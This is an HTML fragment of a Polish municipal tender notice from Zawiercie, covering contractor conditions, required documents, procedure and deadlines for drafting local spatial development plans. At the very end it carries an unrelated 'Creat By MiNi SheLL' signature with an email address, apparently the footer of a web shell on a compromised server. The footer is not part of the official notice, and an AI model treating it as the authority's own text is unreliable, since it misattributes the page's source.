<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał w sposób należyty co najmniej dwa uchwalone i obowiązujące miejscowe plany zagospodarowania przestrzennego w procedurach określonych w ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym, zrealizowane dla obszaru o powierzchni nie mniejszej niż 200 ha każdy.
Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia. Złożenie przez Wykonawcę w ofercie: wykazu wykonanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane należycie - sporządzone wg wzoru stanowiącego załącznik nr 2 do SIWZ. Wykaz i dowody określające, czy usługi te zostały wykonane należycie należy ograniczyć wyłącznie do usług potwierdzających spełnienie warunku w zakresie wiedzy i doświadczenia opisanego w SIWZ. Dowodami, o których mowa powyżej mogą być: poświadczenie, oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. Wykonawca, w miejsce poświadczeń, o których mowa powyżej, może przedkładać dokumenty potwierdzające należyte wykonanie usług określone w § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817). W przypadku, gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej. W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców oraz oświadczenia upoważnionego przedstawiciela Wykonawcy o spełnieniu warunku udziału w postępowaniu (załącznik nr 1 do SIWZ). W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie składa przynajmniej jeden Wykonawca, który spełnia warunek lub wykonawcy wspólnie, będzie stanowiło podstawę do oceny spełnienia warunku udziału w postępowaniu. Zamawiający sprawdzi z treści tych dokumentów i oświadczeń czy Wykonawca spełnia ww. warunek. Zamawiający wymaga, żeby Wykonawca wykazał, nie później niż na dzień składania ofert, spełnianie warunku, o którym mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, iż dysponuje lub będzie dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia:-przynajmniej jedna osoba jako główny projektant jest członkiem Izby Urbanistów (zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów - (Dz.U.2013.932 j.t.). Główny projektant musi posiadać doświadczenie w wykonaniu (samodzielnie lub w zespole) co najmniej dwóch uchwalonych i obowiązujących miejscowych planów zagospodarowania przestrzennego - od podjęcia uchwały o przystąpieniu do jego sporządzenia - do podjęcia uchwały o jego uchwaleniu - według procedur i problematyki określonych w ustawie z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (tekst jednolity: Dz. U. z 2012 r., poz. 647 z późn. zm.), obejmujących obszary miejskie o powierzchni nie mniejszej niż 200 ha każdy;- specjalista w zakresie opracowania ekofizjograficznego: Co najmniej jedna osoba musi wykazać się sporządzeniem - co najmniej dwóch opracowań ekofizjograficznych podstawowych do planów lub studium o powierzchni min. 200 ha każdy, uchwalonych i obowiązujących przed upływem terminu składania ofert;- specjalista w zakresie prognozy oddziaływania na środowisko:Co najmniej jedna osoba musi wykazać się sporządzeniem - co najmniej dwóch opracowań ww. prognozy do miejscowych planów zagospodarowania przestrzennego lub studium o powierzchni min. 200 ha każdy, uchwalonych i obowiązujących przed upływem terminu składania ofert.Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia. Złożenie przez Wykonawcę w ofercie: wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia, zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 3 do SIWZ) na potwierdzenie spełniania warunku, o którym mowa powyżej. (W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokumenty te składa przynajmniej jeden z Wykonawców) oraz oświadczenia upoważnionego przedstawiciela Wykonawcy o spełnieniu warunku udziału w postępowaniu (załącznik nr 1 do SIWZ) W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie składa przynajmniej jeden Wykonawca, który spełnia warunek lub wykonawcy wspólnie, będzie stanowiło podstawę do oceny spełnienia warunku udziału w postępowaniu. Zamawiający sprawdzi z treści tych dokumentów i oświadczeń czy Wykonawca spełnia ww. warunek. Zamawiający wymaga, żeby Wykonawca wykazał, nie później niż na dzień składania ofert, spełnianie warunku, o którym mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz i dowody określające, czy usługi te zostały wykonane w sposób należyty należy ograniczyć wyłącznie do usług potwierdzających spełnienie warunku w zakresie wiedzy i doświadczenia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca złoży wraz z ofertą:
1) Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 6 do SIWZ,
2)Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym załącznik nr 7 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku, gdy:
1)nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
2)nastąpi przekształcenie podmiotowe Wykonawcy,
3)w przypadku zmiany przepisów prawa wpływających na ważność wykonanego przedmiotu umowy, a także w przypadku konieczności doprecyzowania opinii, uzgodnień itp. lub przedłużających się uzgodnień nie z winy Wykonawcy - harmonogram, a także termin realizacji danego etapu prac i konsekwentnie następnych etapów oraz termin realizacji przedmiotu umowy może ulec wydłużeniu,
4)Wykonawca może żądać zmiany terminu wykonania przedmiotu umowy i poszczególnych etapów realizacji w przypadku, jeżeli Zamawiający zmieni dane niezbędne do jego wykonania.
5)zmiany członków zespołu projektowego Wykonawcy, w przypadku wystąpienia nieprzewidzianych okoliczności takich jak: śmierć osoby, rezygnacja/odejście z pracy lub innych uniemożliwiających należyte wykonywanie obowiązków zgodnie z umową lub obowiązującym prawem. W takim jednak przypadku każda nowa osoba musi spełniać warunki określone przez Zamawiającego w ogłoszeniu o zamówieniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zawiercie.bip.net.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2, 42-400 Zawiercie, Wydział Zamówień Publicznych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2014 godzina 10:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2 Punkt Obsługi Interesanta (Informacja), parter UM..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 20.12.13..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com